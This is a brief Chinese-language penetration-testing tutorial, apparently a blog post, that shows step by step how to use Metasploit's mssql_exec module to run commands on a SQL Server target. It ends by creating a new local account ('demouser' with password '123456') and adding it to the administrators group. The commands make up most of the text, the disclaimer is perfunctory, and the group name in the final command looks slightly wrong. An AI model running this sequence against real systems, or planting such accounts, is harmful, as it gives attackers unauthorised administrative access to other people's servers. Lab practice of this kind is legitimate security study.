一、课前声明
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
二、资源装备
1.安装好 Kali Linux 的虚拟机一台
2.搭建好Sql server的靶机一个;
3.整装待发的小白一个。
三、战略安排
3.1 进入Metasploit(msf)***测试框架,如下图所示。
命令:msfconsole
3.2 利用Metasploit(msf)***框架对目标主机漏洞利用模块进行检索,如下图所示。
命令:search mssql_exec
3.3 如下图所示,利用检索到的漏洞利用模块。
命令:use auxiliary/admin/mssql_exec
3.4 查看需要设置的***参数,如下图所示。
命令:show options
3.5 设置cmd命令对目标主机进行控制,如下图所示。
3.5.1 利用cmd命令查看目标主机的用户组
命令:set CMD cmd.exe /c net user
命令:run
3.5.2 利用cmd命令在目标主机上创建新的用户,并且把账户添加到管理员组中,如下图所示。
命令:set CMD cmd.exe /c net user 用户名 密码 /add&net localgroup administrator 用户名 /add
例子:set CMD cmd.exe /c net user demouser 123456 /add&net localgroup administrator demouser /add
命令:run
小编一个个字敲打创作,可辛苦了,问君可否关注一下呢?你还可搜索:Kali与编程,学习更多呢 !
点我学习更多Kali Linux***测试与网络***实战技巧!请添加链接描述